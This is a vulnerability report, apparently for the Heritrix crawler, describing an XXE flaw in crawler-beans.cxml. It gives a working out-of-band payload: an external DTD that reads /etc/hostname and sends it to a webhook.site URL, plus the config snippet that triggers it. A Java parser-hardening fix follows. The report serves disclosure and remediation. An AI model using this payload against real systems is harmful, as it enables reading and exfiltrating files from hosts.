Description
I'll preface this by saying that yes, I've read security.md, and this seems to fall under the elephant in the room, but I thought it was still worth a bug report.
XXE to LFI in Heritrix-3.14.0:
Impact:
While the severity of this vulnerability is high, its practical impact is low, since only authorized Heritrix users should have permission to modify crawler-beans.cxml. As far as I can tell, it can only be exploited by someone with write access to that file.
Verification:
- Download the latest version of Heritrix and set it up as specified here.
- Go to https://webhook.site to get a temporary endpoint.
- Click 'edit' and paste the following into the content field:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "
<!ENTITY &#x25; exfil SYSTEM 'https://webhook.site/<YOUR UUID>/?d=%file;'>">
%eval;
%exfil;
- Set the content type to application/octet-stream.
- Add the following somewhere in the crawler configuration (crawler-beans.cxml):
<!DOCTYPE beans [
<!ENTITY % xxe SYSTEM "https://webhook.site/<YOUR UUID>">
%xxe;
]>
- Whenever the job is built (or, really, whenever the XML is parsed in any way), the parser fetches the external DTD and sends the contents of the file named in it (/etc/hostname here) to the webhook URL.
Remediation:
To mitigate this vulnerability, disable DOCTYPE declarations by setting the XML parser feature http://apache.org/xml/features/disallow-doctype-decl to true in CrawlJob.java. This prevents both XXE attacks and related XML-based DoS vectors (e.g., Billion Laughs).
Before implementing, verify that no legitimate functionality depends on external entity resolution. It didn't seem to be the case here, but it's something to consider.
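
As a rough illustration of the remediation, here is a minimal sketch using the JDK's built-in JAXP parser. The class `HardenedXml` and its methods are hypothetical names of mine, not Heritrix code, and I'm assuming the parser in CrawlJob.java is (or can be) created through a `DocumentBuilderFactory`; if it is created some other way, the same feature would need to be set on that parser instead.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical helper for illustration only; not part of Heritrix.
class HardenedXml {

    // Builds a factory that rejects any document containing a DOCTYPE.
    static DocumentBuilderFactory newHardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // The key setting: a DOCTYPE declaration becomes a fatal parse error,
        // so neither internal nor external entities can be declared at all.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth: processing limits, no XInclude, no entity expansion.
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Returns true if the hardened parser accepts the document, false if it
    // rejects it (because of a DOCTYPE or any other parse error).
    static boolean parses(String xml) throws ParserConfigurationException, IOException {
        DocumentBuilder builder = newHardenedFactory().newDocumentBuilder();
        try {
            builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (SAXException e) {
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // A plain document is accepted.
        System.out.println(parses("<beans/>"));
        // A document with a DOCTYPE is rejected before any entity is resolved.
        System.out.println(parses("<!DOCTYPE beans [<!ENTITY x \"y\">]><beans/>"));
    }
}
```

With this configuration the payload above should fail at the `<!DOCTYPE beans [` line, before the parser ever contacts the webhook URL. Note that this would also reject any crawler-beans.cxml that legitimately carries a DOCTYPE, which is the reason for the caveat above.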